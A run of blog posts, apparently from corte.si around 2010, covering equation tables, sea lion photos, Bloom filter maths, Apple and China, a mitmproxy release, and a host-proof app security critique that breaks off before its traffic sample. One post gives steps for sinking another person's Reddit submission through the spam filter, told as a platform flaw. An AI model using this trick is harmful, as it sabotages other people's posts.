src="74.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Heat_equation">Heat equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="75.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="76.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="77.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="78.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="79.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="80.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="81.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="82.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="83.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="84.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="85.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="86.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="87.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="88.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="89.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="90.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="91.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Wave_equation">Wave equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="92.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="93.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="94.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="95.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Primitive_equations">Primitive equations</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="96.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="97.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Quintic_equation">Quintic equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="98.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="99.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="100.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="101.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="102.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Black%E2%80%93Scholes_equation">Black–Scholes equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="103.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="104.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="105.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Fredholm_integral_equation">Fredholm integral equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="106.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Poisson%27s_equation">Poisson&#39;s equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="107.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="108.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="109.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Helmholtz_Equation">Helmholtz Equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="110.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Van_der_Waals_equation">Van der Waals equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="111.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="112.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="113.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="114.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="115.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Lorentz_equation">Lorentz equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="116.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="117.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="118.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Maxwell%27s_equations">Maxwell&#39;s equations</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="119.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="120.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="121.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="122.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="123.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="124.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="125.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="126.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="127.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="128.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="129.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="130.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="131.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="132.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="133.png"/> </td> </tr> </table> Sea lions and lifestyle change 2010-09-02T00:00:00+00:00 2010-09-02T00:00:00+00:00 https://corte.si/posts/photos/sealions-and-lifestyle/ <p>About a year and a half ago, after dinner at a favourite local restaurant, and having entered into that zone of philosophical clarity that sets in around the dessert wine, my wife and I had the sudden simultaneous realisation that it was time for a change. For most of our adult lives, we had lived in the suburb of Newtown in Sydney - a hyper-urban jungle densely packed with coffee shops and theatres, inhabited by a thronging mixture of students and bohemians with counterculturally-correct hairdos. It was all beginning to seem a bit tired and same-ish. We needed more time and more space. We needed to get back to the essentials of life.</p> <p>Four weeks later our furniture was in a shipping container en-route to Dunedin, a small university town near the southern tip of New Zealand. We decided to work together from home, keeping our schedules flexible to make time for walks, reading, cooking, and (more recently) spending time with our son. It was a huge risk - it was quite possible that the isolation would impose a punishing work travel regime on me, or put a crimp in my wife's very specialised career in linguistics. It took enterprise, determination and a no small amount of possibly-foolish optimism, but it's all worked out. Our leap of faith has turned out to be one of the best decisions we've ever made. Dunedin is a breathtakingly beautiful place to live - I still can't quite believe that I can get up from my desk, and within 20 minutes be on a deserted beach littered with lazy sea lions basking in the winter sun.</p> <p>My advice to you is this: when your life begins to seem a bit stuffy and constricted, when you begin to feel you've lost sight of something more fundamental and get the urge to refactor - <em>just do it</em>. There has never been a better time in history for people who choose to march to a different drum.</p> <p>To prove what a lucky fellow I am, here are two photos from my walk yesterday morning - click to view in a lightbox.</p> <div class="media"> <a href="male-full.jpg"> <img src="male.jpg" /> </a> </div> <p>It's not clear from the picture, but this is a massive New Zealand Sea Lion bull - about 400 kilograms of apparently boneless muscle and blubber.</p> <div class="media"> <a href="female-full.jpg"> <img src="female.jpg" /> </a> </div> <p>It's hard to believe that this sleek female is the same species as the dumpy, snub-nosed chap above. New Zealand Sea Lions are the rarest species of sea lion in the world - it's an immense privilege to be able to share a beach with them.</p> 3 Rules of thumb for Bloom Filters 2010-08-25T00:00:00+00:00 2010-08-25T00:00:00+00:00 https://corte.si/posts/code/bloom-filter-rules-of-thumb/ <p>I've spent a few days this week working on a side-project that relies heavily on Bloom Filters (look for a post on the result of my labours in the next week or so). If you don't know what a Bloom filter is, <a rel="external" href="http://en.wikipedia.org/wiki/Bloom_filter">you should probably find out</a> - they're very neat and have a <a rel="external" href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.127.9672&amp;rep=rep1&amp;type=pdf">huge</a> <a rel="external" href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.4.3831&amp;rep=rep1&amp;type=pdf">range</a> of <a rel="external" href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.126.2458&amp;rep=rep1&amp;type=pdf">fascinating</a> <a rel="external" href="http://www.cs.cmu.edu/~dga/papers/fastcache-tr.pdf">applications</a>.</p> <p>I often need to do rough back-of-the-envelope reasoning about things, and I find that doing a bit of work to develop an intuition for how a new technique performs is usually worthwhile. So, here are three broad rules of thumb to remember when discussing Bloom filters down the pub:</p> <h3 id="1-one-byte-per-item-in-the-input-set-gives-about-a-2-false-positive-rate">1 - One byte per item in the input set gives about a 2% false positive rate.</h3> <p>In other words, we can add 1024 elements to a 1KB Bloom Filter, and check for set membership with about a 2% false positive rate. Nifty. Here are some common false positive rates and the approximate required bits per element, assuming an optimal choice of the number of hashes:</p> <table> <tr> <th>fp rate</th> <th>bits</th> </tr> <tr> <td>50%</td> <td>1.44</td> </tr> <tr> <td>10%</td> <td>4.79</td> </tr> <tr> <td>2%</td> <td>8.14</td> </tr> <tr> <td>1%</td> <td>9.58</td> </tr> <tr> <td>0.1%</td> <td>14.38</td> </tr> <tr> <td>0.01%</td> <td>19.17</td> </tr> </table> <p>Graphically, the relation between bits per element and the false positive rate when using an optimal number of hashes looks like this:</p> <div class="media"> <a href="graph.png"> <img src="graph.png" /> </a> <div class="subtitle"> Bits per element vs. false positive probability </div> </div><h3 id="2-the-optimal-number-of-hash-functions-is-about-0-7-times-the-number-of-bits-per-item">2 - The optimal number of hash functions is about 0.7 times the number of bits per item.</h3> <p>This means that the number of hashes is "small", varying from about 3 at a 10% false positive rate, to about 13 at a 0.01% false positive rate.</p> <h3 id="3-the-number-of-hashes-dominates-performance">3 - The number of hashes dominates performance.</h3> <p>The number of hashes determines the number of bits that need to be read to test for membership, the number of bits that need to be written to add an element, and the amount of computation needed to calculate hashes themselves. We may sometimes choose to use a less than optimal number of hashes for performance reasons (especially when we choose to round down when the calculated optimal number of hashes is fractional).</p> <h2 id="the-maths">The maths</h2> <p>Let's do some maths to justify the above, starting with two well-known results about Bloom filters that can be found in every description of the data structure. First, by a combinatoric argument we can show that the probability <strong>p</strong> of a false positive is approximated by the following formula, where <strong>k</strong> is the number of hash functions, <strong>n</strong> is the size of the input set and <strong>m</strong> is the size of the Bloom filter in bits:</p> <div class="media"> <a href="formula-1.png"> <img src="formula-1.png" /> </a> </div> <p>Second, we know that <strong>k</strong> is optimal when:</p> <div class="media"> <a href="formula-2.png"> <img src="formula-2.png" /> </a> </div> <p>Notice that in this formula, <strong>m/n</strong> is the number of bits per element in the Bloom filter. So, the optimal number of hashes grows linearly with the number of bits per element (<strong>b</strong>):</p> <div class="media"> <a href="formula-6.png"> <img src="formula-6.png" /> </a> </div> <p>Assuming an optimal choice for <strong>k</strong> in the first formula, we get :</p> <div class="media"> <a href="formula-3.png"> <img src="formula-3.png" /> </a> </div> <p>Solving for <strong>m</strong>:</p> <div class="media"> <a href="formula-4.png"> <img src="formula-4.png" /> </a> </div> <p>It's clear from the above that for a given false-positive rate, the number of bits in a Bloom filter grows linearly with <strong>n</strong>. If we set <strong>n = 1</strong>, we get the following expression for the approximate number of bits needed per set element:</p> <div class="media"> <a href="formula-5.png"> <img src="formula-5.png" /> </a> </div> Love and war on Sandfly Beach 2010-08-16T00:00:00+00:00 2010-08-16T00:00:00+00:00 https://corte.si/posts/photos/sandflysealions/ <p>Hiked to the end of <a rel="external" href="http://en.wikipedia.org/wiki/Sandfly_Bay">Sandfly Bay</a> today. A strong North-Easter drove streams of fine beach-sand across the dunes, making it feel like we were wading knee-deep in a swift river of sand. Surreal and beautiful, but I was too afraid of getting grit into my camera to photograph the scene.</p> <p>At the end of the beach, we found two groups of <a rel="external" href="http://en.wikipedia.org/wiki/New_Zealand_Sea_Lion">New Zealand Sea Lions</a>. A female basking with two large cubs, and two young males sparring while a massive mature bull looked on.</p> <p>Click to view in full size.</p> <div class="media"> <a href="sealion_with_cubs_full.jpg"> <img src="sealion_with_cubs.jpg" /> </a> <div class="subtitle"> Sea lion with cubs </div> </div><div class="media"> <a href="sparring_sealions_full.jpg"> <img src="sparring_sealions.jpg" /> </a> <div class="subtitle"> Sparring sea lions </div> </div> sortvis.org 2010-07-14T00:00:00+00:00 2010-07-14T00:00:00+00:00 https://corte.si/posts/visualisation/sortvisdotorg/ <p>I've just put up <a rel="external" href="http://sortvis.org">sortvis.org</a>, the new official home of the <a rel="external" href="http://github.com/cortesi/sortvis">sortvis</a> sorting algorithm visualisation project. The site has a complete set of up-to-date images, explanations of the visualisation techniques, code snippets, and a rather snazzy Javascript image viewer to let you pan and zoom through the huge images produced by the sortvis <a rel="external" href="http://sortvis.org/visualisations.html">dense</a> visualisation. Take a look, and let me know what you think!</p> Taiaroa Head 2010-05-18T00:00:00+00:00 2010-05-18T00:00:00+00:00 https://corte.si/posts/photos/taiaroa/ <div class="media"> <a href="taiaroa-full.jpg"> <img src="taiaroa.jpg" /> </a> <div class="subtitle"> Taiaroa head </div> </div> <p>Taken on a stormy day from Aramoana Mole.</p> Apple, China and the war of ideas 2010-05-07T00:00:00+00:00 2010-05-07T00:00:00+00:00 https://corte.si/posts/politics/apple-is-china/ <p>There was a minor flap recently when <a rel="external" href="http://www.androidguys.com/2010/04/27/andy-rubin-reacts-steve-jobs-likens-apple-north-korea/">Andy Rubin compared Apple to North Korea</a>. Many <a rel="external" href="http://www.youtube.com/watch?v=lQKdEdzHnfU">turtle-necked Apple hipsters</a> had their feathers mildly ruffled, and bloggers gleefully reaped a tiny flurry of page impressions. Quite right too, because Rubin was clearly wrong. Apple is nothing like North Korea, because <strong>Apple is the China of the tech world</strong>. Lend me your ears for a minute, while I make a broad-strokes argument for this statement.</p> <div class="media"> <a href="mao.jpg"> <img src="mao.jpg" /> </a> </div> <p>Not so long ago, the consensus in the West was that political liberty and capitalism went hand-in-hand. Wherever one arose, the other would inevitably follow, and in their wake would come prosperity. When China started liberalising its markets, it seemed self-evident that the rise of capitalism in China would bring democracy in its wake. The Tiananmen Square protests in 1989 were supposed to be a sign of things to come, a precursor to wider revolution. The West's argument was persuasive - it was borne out by a century during which the world was a roiling cauldron of political and economic experimentation, and nearly every command economy had failed. Today, the international landscape has changed entirely. The West has had a catastrophic financial meltdown, and things are only getting worse. There is a sense that the US-led Western order is in decline, and the Chinese-led east is rising. China has been the fastest growing major economy in the world for a decade, and the Communist Party is more firmly in control than ever. Today, there's no apparent prospect of political reform. Chinese intellectuals and diplomats are beginning to mount an increasingly assertive and persuasive argument for a system of government that brings prosperity without liberty, and dictatorships the world over are listening very, very carefully.</p> <p>In the software world, we've also spent decades arguing that freedom and prosperity go hand in hand. This is the <a rel="external" href="http://en.wikipedia.org/wiki/Open_source_software#Open_source_software_vs._free_software">"Open Source"</a> justification for free software: a pragmatic position that we should have liberty not for its own sake, but because it produces better outcomes. This is also the argument behind open hardware platforms, behind open Internet standards, behind interoperability. Some bloody battles had to be fought with monopolists, but in the main the last 20 years have been a stunning success for openness. There has always been a <a rel="external" href="http://en.wikipedia.org/wiki/Richard_Stallman">minority</a> who have made a more fundamental case for liberty, but it's important to recognize that they have lost the debate. The engine that drives the most important Open Source projects is entirely based on a superficial utilitarianism - the Googles and IBMs of the world don't contribute to Open Source because they love liberty, but because the financial return they get from doing so is greater than their investment. The fundamental distinction between openness and free-ness hasn't been important so far, though, because ideology and utilitarian arguments were aligned. Now, things are changing. No-one can deny that Apple's mobile device strategy has been a complete slam-dunk. The iPhone is the <a rel="external" href="http://tech.fortune.cnn.com/2010/03/02/what-doth-it-profit-an-iphone/">most profitable handset out there</a> by far, and the iPad is shaping up to be huge. Apple's long-term plan is breathtakingly ambitious - it's making a play for complete dominance in the mobile market, with an integrated offering that controls everything from content to applications to the devices themselves. It's therefore making a play for total control of the way most people will experience computation in the near future. Not even the most die-hard free-software hippie can deny that Apple's success has been won on merit - their devices are simply, unmistakably better than the competition. Open platforms have been out-classed in almost every measurable dimension. So, we may be entering the next stage of the computer revolution with devices where every native application has to be approved by a single authority, where even programming languages and development tools are centrally controlled. Apple's competitors and imitators are watching and taking notes, because far from being punished by the market for this, they have profited beyond the wildest dreams of avarice.</p> <p>Apple and China have put pragmatists who also value freedom in a quandary. In the past, practice and ideology aligned neatly: political liberty and economic progress went hand in hand, and so did open platforms and commercial success. There are now powerful counter-examples to this line of thinking, and it seems clear that making a pragmatic argument for liberty has been a strategic mis-step both in politics and in technology. Advocates of freedom will have to turn back to more fundamental arguments: human rights, ethics and morality. We should recognize that at this point in time, we're losing the war of ideas. I must admit, in my darker moments I'm pessimistic about our ability to make the case persuasively to a disengaged public.</p> <p><strong>PS</strong></p> <p>To keep this post manageable, I've not talked about factors that muddy the waters for the technical side of the argument. For instance, I don't think Microsoft is a counter-example, and neither is Apple's support for open web standards. I'll save those for a future post. I'd also like to point out that I'm absolutely not anti-Apple - I own a lot of Apple gear that I use every day. My position regarding China's place in the world is a caricature of <a rel="external" href="http://en.wikipedia.org/wiki/Stefan_Halper">Stefan Halper</a>'s superb book <a rel="external" href="http://www.amazon.com/Beijing-Consensus-Authoritarian-Dominate-Twenty-First/dp/0465013619/">"The Beijing Consensus: How China's authoritarian model will dominate the twenty-first century"</a>. You can listen to him speaking about this book at the Cato Institute <a rel="external" href="http://www.cato.org/event.php?eventid=6990">over here</a>.</p> Sortvis updates 2010-04-01T00:00:00+00:00 2010-04-01T00:00:00+00:00 https://corte.si/posts/visualisation/sortvis-update/ <div class="media"> <a href="oddevensort.png"> <img src="oddevensort.png" /> </a> </div> <p>There have been some improvements to <a rel="external" href="http://sortvis.org">sortvis</a>!@) - my sorting algorithm visualisation project - in the last few months. Graphs are now more balanced, with an equal lead-in and lead-off at the edges. There have also been a swathe of algorithm contributions - thanks to Aaron Gallagher and Chris Wong (the image above is of <a rel="external" href="http://en.wikipedia.org/wiki/Odd-even_sort">Odd-even Sort</a>, contributed by Aaron). As usual, you can find the code for all of this on <a rel="external" href="http://github.com/cortesi/sortvis">github</a>. I've updated the visualisation page on my blog with new graphs for all algorithms - go take a look <a rel="external" href="http://sortvis.org">here</a>.</p> <p>I plan to move sortvis and the collection of visualisations onto their own domain soon. I'm also thinking about making large wall-posters of the visualisations available. I plan to make some prints for myself, and I'm assuming that I'm not the only one geeky enough to want a sorting algorithm on my wall. Would anyone be interested?</p> mitmproxy 0.2 2010-03-01T00:00:00+00:00 2010-03-01T00:00:00+00:00 https://corte.si/posts/software/mitmproxy0_2/ <p>Just released <a rel="external" href="http://mitmrpoxy.org">mitmproxy 0.2</a>. Changes include:</p> <ul> <li>Big speed and responsiveness improvements, thanks to Thomas Roth</li> <li>Support urwid 0.9.9</li> <li>Terminal beeping based on filter expressions</li> <li>Filter expressions for terminal beeps, limits, interceptions and sticky cookies can now be passed on the command line.</li> <li>Save requests and responses to file</li> <li>Split off non-interactive dump functionality into a new tool called mitmdump</li> <li>"A" will now accept all intercepted connections</li> <li>Lots of bugfixes</li> </ul> How to stop a story from appearing on Reddit 2010-02-28T00:00:00+00:00 2010-02-28T00:00:00+00:00 https://corte.si/posts/socialmedia/reddit-story-dos/ <div class="media"> <a href="reddit-story-dos.jpg"> <img src="reddit-story-dos.jpg" /> </a> </div> <p>Mallory hates Bob. Bob has a blog about ponies, and Mallory knows that a large-ish fraction of Bob's traffic comes from the <a rel="external" href="http://www.reddit.com/r/ponies">ponies Subreddit</a>. If Bob's stories stopped appearing there it would make him sad, and Mallory, the venomous little sadist that he is, would rejoice. Here's how Mallory could accomplish the deed:</p> <ul> <li>Watch Bob's blog closely to make sure he's the first to submit Bob's posts to Reddit.</li> <li>Include some words that will trigger the spam-filter in the submission title. Any combination of "viagra" and "cialis" will do just fine.</li> <li>Sit back and cackle evilly.</li> </ul> <p>Now Bob's post is sitting in the spam queue on the ponies Subreddit. Since the post has already been submitted, the nice users who usually submit Bob's story can't re-submit it to the same Subreddit. Maybe someone will notice and alert a moderator, but by the time they un-ban the story nobody cares because it's already 10 hours old and on page 50 of the /new queue. Bob thinks nobody loves him, and retires to live out the remainder of his years, sad and lonely, in a small, unheated hut on a hill outside of town.</p> <p>In this story, I am Bob, Mallory is some innocent schmuck who submitted my <a href="https://corte.si/posts/security/hostproof/">last post</a> to the programming Subreddit while they were silently banned (how were they to know, right?), and the small, unheated hut is the Aeron chair in front of my desk. The blog about ponies, however, is entirely fictional.</p> Host-proof applications: doing it wrong 2010-02-26T00:00:00+00:00 2010-02-26T00:00:00+00:00 https://corte.si/posts/security/hostproof/ <p><b>Please note that the criticism of Clipperz in this post is now out of date - the Clipperz team is clearly very security-focused, and responded quickly to address the concerns raised below. </b></p> <p>Every day I push another bit of my life into the cloud. There was a time when all my personal data lived on one or two drives I could actually see, touch, and sniff. Now, I don't even run a personal backup anymore - my software is on Github, my emails are with Google and the rest of my personal data is spread evenly between Facebook, Twitter and a handful of online productivity tools. I do keep redundant checkouts of the important stuff, but that's really just a side-effect of needing to be able to work off-line. The truth is, my house and all my gear could sink into the swamp tomorrow, and as long as I have a web browser and git I'd be back to work the same day. How wonderful...</p> <p>... but, then again. I think like a devious, malicious cad <a rel="external" href="http://www.nullcube.com">for a living</a>, and where one part of me sees convenience, another sees spooks, privacy violations and unscrupulous monetisation opportunities. I can't help but feel we got shafted. We were promised a glorious decentralised future where everyone would be in control of their own data, and instead our lives have been sliced up and warehoused in a small handful of all-powerful, opaque silos. The companies running these things all say the same thing - "Trust us!" - but as data leak follows data leak and privacy violation follows privacy violation, there has to come a time when users decide that promises aren't good enough.</p> <h2 id="host-proof-applications">Host-proof applications</h2> <p>It turns out that the first tentative steps towards a better way of doing things have already been taken. The broad goal is simple: to design web applications in such a way that we don't <em>have</em> to trust the host. Javascript interpreters are fast enough nowadays to do real-world crypto at reasonable speeds, so we can encrypt and decrypt data on the client side and store only encrypted data on the server. The server never sees our encryption keys, and if the implementation is secure, couldn't access our data even if it tried.</p> <p>Two groups of people have pioneered this application development style, under two different names. As far as I can tell, the idea was first articulated in 2005 by <a rel="external" href="http://smokey.rhs.com/web/blog/PowerOfTheSchwartz.nsf/d6plinks/RSCZ-6C5G54">Richard Schwartz</a>, and fleshed out on the ajaxpatterns.org wiki under the name <a rel="external" href="http://ajaxpatterns.org/Host-Proof_Hosting">host-proof hosting</a>. Shortly after that, <a rel="external" href="http://clipperz.com">Clipperz</a> floated as the first real-world, commercial implementation of essentially the same idea, but its founders described what they were building as a <a rel="external" href="http://www.clipperz.com/users/marco/blog/2007/08/24/anatomy_zero_knowledge_web_application">zero knowledge web application.</a> Reading these manifestos carefully, it seems clear that although their emphases are different, their core aims and principles are identical. It's also pretty clear that both terms are misnomers. "Zero-knowledge" has a specific <a rel="external" href="http://en.wikipedia.org/wiki/Zero-knowledge_proof">cryptographic meaning</a> that's only peripherally relevant to the broad application design pattern. What's more, the term is misleading to the layperson, since there's no such thing as a "zero-knowledge" application, in any real sense. The server unavoidably knows quite a lot about the client - the address they're connecting from, how frequently they connect, what operations they're executing, what browser they're using, and so on. "Host-proof hosting", on the other hand, assigns the "host-proof" attribute to the wrong end of the pipe. A more accurate term would be <strong>host-proof application</strong>, and that's how I'm going to refer to these ideas in the rest of this post.</p> <p>The pot of gold at the end of this rainbow is to combine the benefits of the cloud with strong, host-independent data security guarantees. The possibilities are incredibly enticing. I can imagine a cryptographic Facebook where you don't need to trust the host to aggregate the entire world's private data in the clear. I can imagine storing medical records and financial data in the cloud while still allowing people to maintain direct control over who uses the data and how. I can imagine a Gmail where everyone uses crypto by default, where decryption and encryption happens right in the browser. Yes, the technical obstacles that stand in the way of these dreams are immense, but if we can surmount them a better world lies beyond.</p> <h2 id="two-steps-to-shangri-la">Two steps to Shangri-la</h2> <p>Before we look at some real-world applications, I'd like to briefly talk about two essential elements of a secure host-proof application: client-side security and verification. Lets take each of these in turn.</p> <h3 id="1-client-side-security">1: Client-side security</h3> <p>Host-proof applications turn the traditional web security model on its head. Instead of trying to secure the server from the browser, we have to secure the browser-side application from the server. In fact, we fundamentally <em>don't care</em> about the server side of the equation - the client-side code should be secure no matter what combination of malicious skulduggery happens upstream. Yes, this does mean that a host-proof app's security hinges on the security of the browser scripting environment, which is undoubtedly one of the most security-hostile spaces ever devised by the mind of man. Many sensible people would call it quits right there, but I think we can do a decent job of client side security with careful thought.</p> <h3 id="2-verification">2: Verification</h3> <p>Once we have a secure client-side application, we need to make the tools and information available to allow users to actually verify that the code running in their browser is secure. This immediately implies that the client-side of the application has to be published somewhere independent for peer review. Perhaps surprisingly, we can also conclude that publishing the server code of a host-proof application is a distraction. Spending time verifying the security of the server code is a waste of effort, since we must always assume that the server has already been compromised, and is actively malicious.</p> <p>The next step in the verification process is harder. Every time the user visits a host-proof application, they are getting a blob of potentially malicious data from the server. It's vital that there be some mechanism that allows the user to check that the code running in their browser matches the code published for peer review. One obvious but cumbersome way to do that is to make sure that your entire application is a single, rolled-up blob, and then to simply publish a checksum. Although it's a pain in the ass to do, in theory users can download and verify the application's integrity. In reality, the vast majority of users won't ever bother use a verification system this cumbersome, and even those that do won't do so every time. That's not a good reason to give up, though - making this process workable for users is critical if the host-proof paradigm is to be viable.</p> <h2 id="how-to-penetration-test-a-host-proof-application">How to penetration test a host-proof application</h2> <p>Two characteristic "game-over" scenarios follow immediately from these security elements. First, we could subvert the verification process to fool the user into using a corrupted application. Second, we could exploit a security hole in the client-side application to execute arbitrary code in the browser. If we can do either of these things, a malicious entity in control of the server could access a user's private data and have their merry way with it. Which would be bad. In both these scenarios the server is the attacker - so, where a traditional web app penetration test often revolves around malicious data sent by the browser to the server, a host-proof app penetration test focuses on malicious responses from the server to the browser. Of course, there are a myriad of other ways in which the security of a host-proof app can fail - but verification and client-side security are the first two hurdles to cross.</p> <p>At this point, you might be thinking that a tool that lets you tamper with server responses before they hit the browser would be damn handy. Tools like <a rel="external" href="https://addons.mozilla.org/en-US/firefox/addon/966">TamperData</a> let you modify outbound requests, but it turns out that extending them to do the same with inbound data is non-trivial. Not entirely coincidentally, though, I recently released a little tool called <a rel="external" href="http://mitmproxy.org">mitmproxy</a> that does the job just fine. It's an interactive, SSL-capable proxy with a curses interface that sits between your browser and the server, letting you intercept and modify requests and responses on the fly.</p> <p>Let's take mitmproxy for a spin to look at some of the contenders in the host-proof application space.</p> <h2 id="clipperz-facepalm">Clipperz: facepalm</h2> <p>First in line is <a rel="external" href="http://www.clipperz.com">Clipperz</a>, a project I've been following for a number of years. The founders - Marco Barulli and Giulio Cesare Solaroli - were early pioneers of the host-proof application paradigm, and as far as I know, were the first to try to make a livelihood by commercialising the idea. To get a flavour for what they're about, I highly recommend <a rel="external" href="http://itc.conversationsnetwork.org/shows/detail4283.html">this interview</a> that Jon Udell did with Barulli.</p> <p>Now, lets review the claims that Clipperz makes for itself. Its <a rel="external" href="http://www.clipperz.com/about">about</a> page says:</p> <blockquote> <p>We got used to trust online services with our data (photos, text documents, spreadsheets, ...) but Clipperz proves that this is not necessary: users can enjoy a web based application without the need to trust the web application provider.</p> </blockquote> <p>The <a rel="external" href="http://www.clipperz.com/support/user_guide">user guide</a> expands on this:</p> <blockquote> <p>Clipperz simply hosts your encrypted cards and provide you with a nice interface to manage your data, but it could never access the cards in their plain form.</p> </blockquote> <p>Well, righty oh! That's a very forthright guarantee. Lets see if Clipperz lives up to it.</p> <h3 id="1-verification">1: Verification</h3> <p>Clipperz takes verification seriously. The entire Clipperz source is prominently published for review. They also seem to have architected their application specifically to make checksum verification possible - the client-side comes down the wire as a single blob, with no external dependencies. This means that verification really can be as simple as taking a checksum over the application page. They even have <a rel="external" href="http://www.clipperz.com/reviewing_the_code/checksums">instructions that show how to do this using wget</a>.</p> <p>There are two important criticisms of the Clipperz verification process. Most critically, they publish the checksums and verification package right on the Clipperz homepage. If we assume that the server has been compromised, the attacker is in control of both the checksums and the app, and we're up the creek. Secondly, although Clipperz has gone to a lot of effort to make the process easy, verification is still too cumbersome. The vast majority of their users will never bother to verify their client-side at all. Some more innovation is needed from an already very innovative company to make this process simpler.</p> <p>All told, though, this is a good effort - with a little bit of extra work, Clipperz would get a definite "pass" for verification.</p> <h3 id="2-client-side-security">2: Client-side security</h3> <p>Client-side security is a different story. The moment we look at the traffic between the client and server, it's immediately clear that something is very, very wrong. Here's a sample of what comes down the pipe to the client:</p> <pre class="giallo" style="color: #24292E; background-color: 